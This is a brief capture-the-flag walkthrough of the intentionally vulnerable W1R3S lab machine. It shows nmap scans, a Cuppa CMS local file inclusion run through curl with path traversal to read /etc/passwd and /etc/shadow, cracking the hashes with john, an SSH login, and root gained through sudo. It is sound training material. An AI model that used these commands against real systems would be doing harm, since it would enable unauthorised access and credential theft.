CTF: W1R3S Walkthrough

      Nessun commento su CTF: W1R3S Walkthrough

Hello dear friends, welcome back for another CTF Walkthrough. Today we will solve  W1R3S.


You have been hired to do a penetration test on the W1R3S.inc individual server and report all findings. They have asked you to gain root access and find the flag (located in /root directory).

  • Difficulty to get a low privileged shell: Beginner/Intermediate
  • Difficulty to get privilege escalation: Beginner/Intermediate
  • About: This is a vulnerable Ubuntu box giving you somewhat of a real-world scenario and reminds me of the OSCP labs.

Information gathering

TCP Scanning

  • nmap -Pn -p- -T5 -oN tcpScan

Banner Grabbing

  • nmap -sC -sV -p 21,22,80,3306 -oN services


There is an FTP server running at port 21, that accept anonymous user.

Nothing of special, the content of these folders do not contain anything interesting for resolve this CTF.



There are two cms running on the web server WordPress and cuppa, the last one has a Local/Remote File Inclusion vulnerability, indeed we will use lfi to read the passwd and the shadow file.

  • curl -s –data-urlencode urlConfig=../../../../../../../../../etc/passwd >> passwd
  • curl -s –data-urlencode urlConfig=../../../../../../../../../etc/shadow >> shadow
  • Remove the html code from the passwd and the shadow file
  • unshadow passwd shadow > unshadow.db
  • john unshadow.db

Great we have the password for the w1r3s user


At this point, we can connect to the target machine throw ssh

  • ssh w1r3s@

Privilege escalation

  • Check what we can execute as sudo: sudo -l

  • sudo su
  • cd root
  • cat flag.txt

Fantastic we have completed the W1R3S machine.